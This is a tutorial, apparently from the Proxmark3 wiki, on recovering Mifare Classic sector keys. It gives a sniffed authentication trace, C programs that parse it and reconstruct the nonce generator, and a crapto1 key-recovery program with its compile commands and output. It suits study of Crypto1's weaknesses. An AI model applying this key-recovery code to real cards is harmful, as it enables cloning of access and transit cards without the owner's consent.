Getting the sector key of a Mifare card (from the Proxmark3 Google Code wiki)
Snooping on Mifare communications
This is a working example of how the sector keys of Mifare cards can be retrieved with a Proxmark3, using the "crapto1" package found on Google Code.
The trace below comes from a hi14asnoop session followed by hf 14a list; it shows the beginning of the authentication and encryption protocol:
| Commands | Comment |
|---|---|
| + 561882 : 1 : 26 | REQA |
| + 64 : 2 : TAG 04 00 | Answer to REQA |
| + 10217 : 2 : 93 20 | Select |
| + 64 : 5 : TAG 9c 59 9b 32 6c | The card's UID is therefore 9c 59 9b 32 |
| + 12313 : 9 : 93 70 9c 59 9b 32 6c 6b 30 | Select with UID |
| + 64 : 3 : TAG 08 b6 dd | Tag type (Mifare 1K) |
| + 923318 : 4 : 60 00 f5 7b | AUTH (block 00) |
| + 112 : 4 : TAG 82 a4 16 6c | Tag challenge (nt, "Nonce Tag") |
| + 6985 : 8 : a1 e4 ! 58 ce ! 6e ea ! 41 e0 ! | nr XOR ks1 (Nonce Reader, encrypted, 4 bytes) followed by ar XOR ks2 (Answer Reader to Nonce Tag, encrypted, 4 bytes) |
| + 64 : 4 : TAG 5c ! ad f4 39 ! | at XOR ks3 (Answer Tag, encrypted) |
In order to extract the key for sector 0 from the exchange, we need the following elements:
- Tag UID
- Tag challenge (nt)
- Reader challenge, encrypted (nr XOR ks1, referred to below simply as nr)
- Reader response, encrypted (ar XOR ks2, referred to below simply as ar)
- Tag response, encrypted (at XOR ks3, referred to below simply as at)
In the example above:
- UID : 0x9c599b32
- nt : 0x82a4166c
- nr : 0xa1e458ce
- ar : 0x6eea41e0
- at : 0x5cadf439
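Reading those five values off the trace by hand works for one capture, but it is easy to pick the wrong frame. As an added example (not part of the original page, of crapto1 or of the Proxmark3 code), the C program below extracts them automatically from the trace lines above and validates what can be validated first. It assumes the hf 14a list line layout shown above, `+ <time> : <len> : [TAG] bytes`, with `!` marking a byte whose parity bit failed to check (only the Crypto1-encrypted bytes carry that mark, because the cipher encrypts the parity bits as well). Before trusting the numbers it checks that the fifth byte of the anticollision answer is the XOR of the four UID bytes (the BCC) and that the plaintext frames end in a correct ISO 14443-3 CRC_A, which is how `60 00 f5 7b` decodes as an AUTH with key A (0x60) on block 00 followed by its CRC. The function and struct names are my own; the trace lines are copied from this page.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Trace lines of the snoop session shown on this page, in order. */
static const char *const TRACE[] = {
    "+ 561882 : 1 : 26",
    "+ 64 : 2 : TAG 04 00",
    "+ 10217 : 2 : 93 20",
    "+ 64 : 5 : TAG 9c 59 9b 32 6c",
    "+ 12313 : 9 : 93 70 9c 59 9b 32 6c 6b 30",
    "+ 64 : 3 : TAG 08 b6 dd",
    "+ 923318 : 4 : 60 00 f5 7b",
    "+ 112 : 4 : TAG 82 a4 16 6c",
    "+ 6985 : 8 : a1 e4 ! 58 ce ! 6e ea ! 41 e0 !",
    "+ 64 : 4 : TAG 5c ! ad f4 39 !",
};

/* One decoded line: direction, count of '!' parity-error markers, data bytes. */
struct frame { int from_tag, parity_errors; size_t len; uint8_t data[16]; };

/* ISO 14443-3 CRC_A (reflected polynomial 0x8408, initial value 0x6363),
   sent after the data least-significant byte first. */
uint16_t crc_a(const uint8_t *data, size_t len)
{
    uint16_t crc = 0x6363;
    for (size_t i = 0; i < len; i++) {
        uint8_t b = data[i] ^ (uint8_t)(crc & 0xff);
        b ^= (uint8_t)(b << 4);
        crc = (uint16_t)((crc >> 8) ^ ((uint16_t)b << 8) ^ ((uint16_t)b << 3) ^ (b >> 4));
    }
    return crc;
}

/* 1 if the last two bytes of the frame are the CRC_A of the bytes before them. */
int frame_crc_ok(const uint8_t *frame, size_t len)
{
    if (len < 3) return 0;
    uint16_t crc = crc_a(frame, len - 2);
    return frame[len - 2] == (crc & 0xff) && frame[len - 1] == (crc >> 8);
}

/* Parse one "hf 14a list" line, "+ <time> : <len> : [TAG] xx xx [!] ...":
   skip the first two fields, collect the hex bytes, note the TAG and '!' markers. */
int parse_trace_line(const char *line, struct frame *f)
{
    memset(f, 0, sizeof *f);
    const char *p = strchr(line, ':');
    if (p) p = strchr(p + 1, ':');
    if (!p) return 0;
    for (p++; *p; ) {
        if (*p == ' ') { p++; continue; }
        if (strncmp(p, "TAG", 3) == 0) { f->from_tag = 1; p += 3; continue; }
        if (*p == '!') { f->parity_errors++; p++; continue; }
        if (!isxdigit((unsigned char)p[0]) || !isxdigit((unsigned char)p[1]) || f->len >= 16)
            return 0;
        char hex[3] = { p[0], p[1], '\0' };
        f->data[f->len++] = (uint8_t)strtoul(hex, NULL, 16);
        p += 2;
    }
    return f->len > 0;
}

/* Big-endian 32-bit word from four bytes, the order they appear on the wire. */
static uint32_t be32(const uint8_t *p)
{ return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3]; }

struct auth_params { uint32_t uid, nt, nr_enc, ar_enc, at_enc; int ok; };

/* Walk the trace in protocol order: 5-byte anticollision answer (UID + BCC, the XOR
   of the UID bytes), plaintext AUTH command (0x60 key A / 0x61 key B, block, CRC_A),
   then nt from the tag, {nr}{ar} from the reader and {at} from the tag. */
struct auth_params extract_auth(const char *const *lines, size_t n)
{
    struct auth_params a = {0};
    struct frame f;
    int stage = 0;  /* 0 UID, 1 AUTH, 2 nt, 3 {nr}{ar}, 4 {at} */
    for (size_t i = 0; i < n && !a.ok; i++) {
        if (!parse_trace_line(lines[i], &f)) continue;
        int tag = f.from_tag, len = (int)f.len;
        if (stage == 0 && tag && len == 5 &&
            (f.data[0] ^ f.data[1] ^ f.data[2] ^ f.data[3]) == f.data[4]) {
            a.uid = be32(f.data); stage = 1;
        } else if (stage == 1 && !tag && len == 4 && (f.data[0] == 0x60 || f.data[0] == 0x61)
                   && frame_crc_ok(f.data, 4)) {
            stage = 2;
        } else if (stage == 2 && tag && len == 4) { a.nt = be32(f.data); stage = 3; }
        else if (stage == 3 && !tag && len == 8) {
            a.nr_enc = be32(f.data); a.ar_enc = be32(f.data + 4); stage = 4;
        } else if (stage == 4 && tag && len == 4) { a.at_enc = be32(f.data); a.ok = 1; }
    }
    return a;
}

int main(void)
{
    struct auth_params a = extract_auth(TRACE, sizeof TRACE / sizeof TRACE[0]);
    if (!a.ok) { puts("no complete authentication exchange in the trace"); return 1; }
    printf("uid %08x  nt %08x  {nr} %08x  {ar} %08x  {at} %08x\n", (unsigned)a.uid,
           (unsigned)a.nt, (unsigned)a.nr_enc, (unsigned)a.ar_enc, (unsigned)a.at_enc);
    return 0;
}
```

Run on the trace above it prints exactly the five values listed in the text. A frame with a bad BCC or CRC never advances the state machine, so a truncated or corrupted capture yields "no complete authentication exchange" rather than a plausible-looking but wrong set of inputs for the key recovery.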
Those can then be used in the following "crapto1" test program:
// Test-file: test2.c
#include "crapto1.h"
#include <stdint.h>
#include <stdio.h>

int main(void)
{
    struct Crypto1State *revstate;
    uint64_t lfsr;

    /* Values read from the snooped authentication exchange */
    uint32_t uid = 0x9c599b32;              /* card UID */
    uint32_t tag_challenge = 0x82a4166c;    /* nt */
    uint32_t nr_enc = 0xa1e458ce;           /* nr XOR ks1 */
    uint32_t reader_response = 0x6eea41e0;  /* ar XOR ks2 */
    uint32_t tag_response = 0x5cadf439;     /* at XOR ks3 */

    /* ar is suc64(nt) and at is suc96(nt); XORing the encrypted answers with
       those known plaintexts yields the keystream words ks2 and ks3 */
    uint32_t ks2 = reader_response ^ prng_successor(tag_challenge, 64);
    uint32_t ks3 = tag_response ^ prng_successor(tag_challenge, 96);
    printf("nt': %08x\n", prng_successor(tag_challenge, 64));
    printf("nt'': %08x\n", prng_successor(tag_challenge, 96));
    printf("ks2: %08x\n", ks2);
    printf("ks3: %08x\n", ks3);

    /* Recover the cipher state that produced ks2 and ks3, then roll it back over
       ks3 and ks2 (no input), the encrypted reader nonce (fed in as ciphertext)
       and the initial uid XOR nt, which leaves the state right after key loading,
       i.e. the key itself */
    revstate = lfsr_recovery(ks2, ks3);
    lfsr_rollback(revstate, 0, 0);
    lfsr_rollback(revstate, 0, 0);
    lfsr_rollback(revstate, nr_enc, 1);
    lfsr_rollback(revstate, uid ^ tag_challenge, 0);
    crypto1_get_lfsr(revstate, &lfsr);

    /* The 48-bit key comes back as an integer whose most significant byte is the
       first key byte, so print it from the top down rather than reading the
       integer's bytes from memory, which reverses the order on little-endian hosts */
    printf("Found Key: [%02x %02x %02x %02x %02x %02x]\n\n",
           (unsigned)(lfsr >> 40) & 0xff, (unsigned)(lfsr >> 32) & 0xff,
           (unsigned)(lfsr >> 24) & 0xff, (unsigned)(lfsr >> 16) & 0xff,
           (unsigned)(lfsr >> 8) & 0xff, (unsigned)lfsr & 0xff);
    return 0;
}
Then compile it together with the crapto1 sources:
gcc -o test2 test2.c crapto1.c crypto1.c
And run it like this:
./test2
nt': 8d65734b
nt'': 9a427b20
ks2: e38f32ab
ks3: c6ef8f19
Found Key: [ff ff ff ff ff ff]
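The nt' and nt'' lines in that output are the only two numbers the test program derives rather than copies, so it is worth seeing where they come from. The following C program is an added example (my own code, not the page's test program and not crapto1): it reimplements the tag-nonce generator from its public definition, a 16-bit LFSR with feedback polynomial x^16 + x^14 + x^13 + x^11 + 1 whose output is sent 32 bits at a time, and reproduces nt', nt'', ks2 and ks3 from the trace values above. It goes one step beyond the page in nonce_from_seed and nonce_is_valid, which rebuild a full nonce from its first 16 transmitted bits; that is the check a defender can run on any captured nonce, since a genuine Crypto1 nonce has only 16 bits of entropy and its second half is fully determined by the first. The function names are my own; nonce_successor follows the same contract as crapto1's prng_successor.

```c
#include <stdint.h>
#include <stdio.h>

/* Put the bytes in transmission order: the first byte on air becomes the low byte,
   so the LFSR below shifts bits in the order the card emitted them. */
static uint32_t swap32(uint32_t x)
{
    return (x << 24) | ((x & 0xff00u) << 8) | ((x >> 8) & 0xff00u) | (x >> 24);
}

/* One clock of the 16-bit nonce generator (x^16 + x^14 + x^13 + x^11 + 1).
   In this word layout the generator state sits in bits 16..31; the new bit is
   the XOR of bits 16, 18, 19 and 21 and enters at bit 31 as the word shifts right. */
static uint32_t lfsr_step(uint32_t x)
{
    return (x >> 1) | ((((x >> 16) ^ (x >> 18) ^ (x >> 19) ^ (x >> 21)) & 1u) << 31);
}

/* suc^n(nt): the 32-bit value the generator emits n clocks after producing nt
   (same contract as crapto1's prng_successor, reimplemented here). */
uint32_t nonce_successor(uint32_t nt, unsigned n)
{
    uint32_t x = swap32(nt);
    while (n--) x = lfsr_step(x);
    return swap32(x);
}

/* Expand the first 16 transmitted bits of a nonce into the full 32-bit value:
   the second half is a function of the first, so only 16 bits are free. */
uint32_t nonce_from_seed(uint16_t seed)
{
    uint32_t x = (uint32_t)seed << 16;   /* seed bits become the generator state */
    for (int i = 0; i < 16; i++) x = lfsr_step(x);
    return swap32(x);
}

/* A genuine Crypto1 tag nonce regenerates itself from its own first half. */
int nonce_is_valid(uint32_t nt)
{
    return nonce_from_seed((uint16_t)(swap32(nt) & 0xffffu)) == nt;
}

/* The reader proves itself with suc^64(nt) and the tag with suc^96(nt); XORing the
   captured encrypted replies with those plaintexts exposes the keystream words
   ks2 and ks3 that the test program above feeds to lfsr_recovery. */
uint32_t keystream_word(uint32_t encrypted_reply, uint32_t nt, unsigned successor_steps)
{
    return encrypted_reply ^ nonce_successor(nt, successor_steps);
}

int main(void)
{
    /* Values from the trace on this page */
    const uint32_t nt = 0x82a4166cu, ar_enc = 0x6eea41e0u, at_enc = 0x5cadf439u;
    printf("nonce consistent with the 16-bit generator: %s\n", nonce_is_valid(nt) ? "yes" : "no");
    printf("nt':  %08x\n", (unsigned)nonce_successor(nt, 64));
    printf("nt'': %08x\n", (unsigned)nonce_successor(nt, 96));
    printf("ks2:  %08x\n", (unsigned)keystream_word(ar_enc, nt, 64));
    printf("ks3:  %08x\n", (unsigned)keystream_word(at_enc, nt, 96));
    return 0;
}
```

The four printed values match the nt', nt'', ks2 and ks3 lines of the output above, and the consistency check passes for 82 a4 16 6c, confirming that the word layout and tap positions used here reproduce the card's generator.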
You can also use the GUI software to do this; the result is the same.